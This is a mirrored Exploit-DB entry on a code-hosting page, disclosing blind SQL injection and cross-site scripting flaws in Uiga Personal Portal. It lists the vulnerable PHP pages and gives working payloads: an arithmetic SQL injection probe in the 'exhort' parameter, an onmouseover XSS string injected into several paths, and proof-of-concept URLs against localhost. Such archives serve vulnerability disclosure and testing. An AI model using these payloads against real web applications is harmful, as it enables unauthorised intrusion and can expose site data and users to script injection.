bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/18002.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

35 lines
No EOL
801 B
Text
Raw Blame History

# Exploit Title: Uiga Personal Portal Multiple Vulnerability
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
# Web Site: www.eyupcelik.com.tr
ISSUE
Blind SQL Injection and XSS can be done using the command input
Vulnerable Page:
index.php
cart.php
includes/photoview.php
index2.php
Example:
index.php?exhort=%24<Blind SQL Injection Code>&view=ar_det
cart.php/<XSS Code>
includes/photoview.php/<XSS Code>
index2.php/<XSS Code>
Exploit:
index.php?exhort=%2440-2+2*3-6&view=ar_det
cart.php/"onmouseover=prompt(955787)>
includes/photoview.php/"onmouseover=prompt(955787)>
index2.php/"onmouseover=prompt(955787)>
POC:
127.0.0.1/uigaportal/index.php?exhort=%2440-2+2*3-6&view=ar_det
127.0.0.1/uigaportal/cart.php/%22onmouseover=prompt(955787)%3E
Reference in a new issue View git blame Copy permalink